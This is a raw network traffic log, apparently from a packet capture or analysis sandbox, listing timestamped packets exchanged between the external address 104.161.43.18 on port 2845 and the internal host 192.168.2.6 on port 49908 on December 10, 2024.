                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.612385035 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.612423897 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.612464905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.614846945 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.614890099 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.614959002 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.617342949 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.617460012 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.617500067 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.619816065 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.620049000 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.620115042 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.622294903 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.622340918 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.622504950 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.624773979 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.624908924 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.624953985 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.627268076 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.627393007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.627438068 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.713696957 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.713732958 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.713777065 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.714396000 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.714673042 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.714833975 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.714854956 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.716243982 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.716298103 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.716367006 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.717535973 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.717580080 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.717634916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.719063044 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.719120026 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.719153881 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.720457077 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.720511913 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.720525980 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.721858025 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.721904993 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.721970081 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.723298073 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.723337889 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.723401070 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.724647045 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.724762917 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.724786043 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.726026058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.726088047 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.726103067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.727396965 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.727437973 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.727472067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.728804111 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.728858948 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.728889942 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.730169058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.730220079 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.730252981 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.731440067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.731527090 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.731642962 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.732809067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.732856989 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.732896090 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.734138966 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.734164953 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.734189034 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.735528946 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.735549927 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.735578060 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.736741066 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.736782074 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.736790895 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.737966061 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.738014936 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.738076925 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.739245892 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.739301920 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.739342928 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.740719080 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.740799904 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.740840912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.742324114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.742372990 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.742408991 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.743254900 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.743292093 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.743307114 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.744319916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.744366884 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.744458914 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.745580912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.745630026 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.745636940 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.746817112 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.746872902 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.746891022 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.748023033 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.748073101 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.748114109 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.749212027 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.749284983 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.749325991 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.750495911 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.750559092 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.750571966 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.751633883 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.751674891 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.751741886 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.752840042 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.752912998 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.752969980 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.754086018 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.754164934 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.754216909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.755424023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.755456924 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.755479097 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.756485939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.756531954 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.756568909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.757741928 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.757788897 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.757838964 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.758955956 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.759000063 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.759152889 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.760133028 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.760174990 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.760238886 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.761348963 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.761389017 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.761444092 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.762586117 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.762626886 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.762696981 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.763828993 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.763873100 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.763967991 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.765016079 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.765058041 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.765147924 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.766280890 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.766294003 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.766329050 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.767466068 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.767518044 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.767544031 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.768631935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.768682957 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.768841028 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.769857883 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.769881964 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.769905090 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.771039963 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.771085024 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.771158934 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.772322893 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.772378922 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.772428036 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.773534060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.773574114 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.773621082 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.774770975 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.774832010 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.774864912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.775917053 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.775958061 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.776005030 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.777203083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.777249098 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.777250051 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.839031935 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.839072943 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.905813932 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.905877113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.905917883 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.906249046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.906430960 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.906480074 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.906501055 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.907398939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.907440901 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.907546997 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.908485889 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.908530951 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.908575058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.909470081 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.909507990 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.909564972 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.910466909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.910511971 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.910564899 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.911577940 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.911623001 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.911850929 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.912570000 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.912606001 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.912641048 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.913570881 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.913611889 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.913734913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.914601088 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.914659977 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.914676905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.915663958 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.915695906 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.915910959 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.916678905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.916731119 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.916783094 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.917938948 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.917977095 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.918009996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.919070959 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.919102907 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.919163942 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.920062065 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.920099020 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.920105934 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.920903921 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.920939922 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.921003103 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.921794891 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.921827078 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.921911001 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.922894001 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.922907114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.922945023 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.923937082 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.924041033 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.924062014 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.924865007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.924933910 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.924978018 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.925959110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.926002979 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.926031113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.927064896 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.927099943 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.927278042 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.928137064 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.928172112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.928242922 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.929008007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.929044962 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:12.929095030 CET284549908104.161.43.18192.168.2.6
